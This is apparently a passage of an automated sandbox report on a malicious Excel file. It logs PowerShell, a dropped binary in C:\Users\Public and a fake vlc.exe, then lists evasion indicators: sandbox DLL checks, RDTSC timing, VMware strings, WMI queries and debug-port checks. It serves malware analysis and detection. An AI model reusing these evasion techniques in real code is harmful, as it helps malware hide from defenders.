          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeProcess information set: NOOPENFILEERRORBOX
          Source: 5901777.xlsStream path 'Workbook' entropy: 7.92744162749 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: oftmhayq.exe, 00000018.00000002.468670038.0000000002BC9000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.467738260.0000000003439000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\oftmhayq.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\oftmhayq.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00409A90 rdtsc 29_2_00409A90
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\oftmhayq.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\oftmhayq.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3864Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3310Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5124Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3318Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5744Thread sleep count: 3864 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5388Thread sleep count: 3310 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6120Thread sleep time: -9223372036854770s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1304Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5860Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5832Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6124Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4244Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exe TID: 5308Thread sleep count: 39 > 30Jump to behavior
          Source: C:\Users\Public\oftmhayq.exe TID: 4472Thread sleep count: 63 > 30Jump to behavior
          Source: C:\Users\Public\oftmhayq.exe TID: 2288Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\Public\oftmhayq.exe TID: 1012Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Users\Public\oftmhayq.exe TID: 6576Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe TID: 4020Thread sleep count: 59 > 30
          Source: C:\Users\Public\oftmhayq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Users\Public\oftmhayq.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Windows\splwow64.exeLast function: Thread delayed
          Source: C:\Windows\splwow64.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000001F.00000000.510806745.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000014.00000002.442866575.000001D222633000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
          Source: oftmhayq.exe, 00000019.00000002.467738260.0000000003439000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: powershell.exe, 00000015.00000002.442626587.000001F6E4550000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 0000001F.00000000.501168197.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000001F.00000000.515471921.000000000F6C0000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&v
          Source: powershell.exe, 00000015.00000002.442626587.000001F6E4550000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: powershell.exe, 00000014.00000002.443094933.000001D222698000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: powershell.exe, 00000014.00000002.443336380.000001D222A20000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.443298742.000001F6E49C0000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.510238912.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeProcess queried: DebugPort
          Source: C:\Users\Public\oftmhayq.exeProcess queried: DebugPort
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_00409A90 rdtsc 29_2_00409A90
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0040ACD0 LdrLoadDll,29_2_0040ACD0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130513A mov eax, dword ptr fs:[00000030h]29_2_0130513A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130513A mov eax, dword ptr fs:[00000030h]29_2_0130513A
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h]29_2_012F4120
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h]29_2_012F4120
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h]29_2_012F4120
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F4120 mov eax, dword ptr fs:[00000030h]29_2_012F4120
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F4120 mov ecx, dword ptr fs:[00000030h]29_2_012F4120
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3138 mov ecx, dword ptr fs:[00000030h]29_2_012D3138
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9100 mov eax, dword ptr fs:[00000030h]29_2_012D9100
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9100 mov eax, dword ptr fs:[00000030h]29_2_012D9100
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D9100 mov eax, dword ptr fs:[00000030h]29_2_012D9100
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E0100 mov eax, dword ptr fs:[00000030h]29_2_012E0100
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E0100 mov eax, dword ptr fs:[00000030h]29_2_012E0100
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E0100 mov eax, dword ptr fs:[00000030h]29_2_012E0100
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DC962 mov eax, dword ptr fs:[00000030h]29_2_012DC962
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139E962 mov eax, dword ptr fs:[00000030h]29_2_0139E962
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DB171 mov eax, dword ptr fs:[00000030h]29_2_012DB171
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012DB171 mov eax, dword ptr fs:[00000030h]29_2_012DB171
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8966 mov eax, dword ptr fs:[00000030h]29_2_013A8966
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391951 mov eax, dword ptr fs:[00000030h]29_2_01391951
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB944 mov eax, dword ptr fs:[00000030h]29_2_012FB944
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012FB944 mov eax, dword ptr fs:[00000030h]29_2_012FB944
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D395E mov eax, dword ptr fs:[00000030h]29_2_012D395E
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D395E mov eax, dword ptr fs:[00000030h]29_2_012D395E
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h]29_2_012E61A7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h]29_2_012E61A7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h]29_2_012E61A7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012E61A7 mov eax, dword ptr fs:[00000030h]29_2_012E61A7
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013551BE mov eax, dword ptr fs:[00000030h]29_2_013551BE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013551BE mov eax, dword ptr fs:[00000030h]29_2_013551BE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013551BE mov eax, dword ptr fs:[00000030h]29_2_013551BE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013551BE mov eax, dword ptr fs:[00000030h]29_2_013551BE
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013099BC mov eax, dword ptr fs:[00000030h]29_2_013099BC
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130C9BF mov eax, dword ptr fs:[00000030h]29_2_0130C9BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130C9BF mov eax, dword ptr fs:[00000030h]29_2_0130C9BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013AF1B5 mov eax, dword ptr fs:[00000030h]29_2_013AF1B5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013AF1B5 mov eax, dword ptr fs:[00000030h]29_2_013AF1B5
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013061A0 mov eax, dword ptr fs:[00000030h]29_2_013061A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013061A0 mov eax, dword ptr fs:[00000030h]29_2_013061A0
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h]29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h]29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h]29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov ecx, dword ptr fs:[00000030h]29_2_012F99BF
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F99BF mov eax, dword ptr fs:[00000030h]29_2_012F99BF
